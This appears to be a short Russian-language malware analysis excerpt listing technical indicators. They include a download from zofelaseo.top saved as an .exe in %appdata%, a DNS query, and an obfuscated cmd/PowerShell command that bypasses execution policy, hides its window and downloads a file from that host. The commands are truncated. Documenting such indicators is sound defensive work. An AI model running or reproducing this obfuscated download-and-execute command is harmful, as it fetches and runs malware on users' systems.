Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oweR^S^h^el^l^.ex^E -EXEC^u^tIO^NPoLIcy B^YpASS ^-NOPR^of^ile ^-w^INdow^stYle^ h^id^de^n (nEW^-objECt SYSt^em^.Net.W^eb^C^l^I^E^nT).D^oWnl^o^a^DfIL^e('http://zofelaseo.top/read....
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "P^oweR^S^h^el^l^.ex^E -EXEC^u^tIO^NPoLIcy B^YpASS ^-NOPR^of^ile ^-w^INdow^stYle^ h^id^de^n (nEW^-objECt SYSt^em^.Net.W^eb^C^l^I^E^nT).D^oWnl^o^a^DfIL^e('http://zofelaseo.top/read....' (со скрытым окном)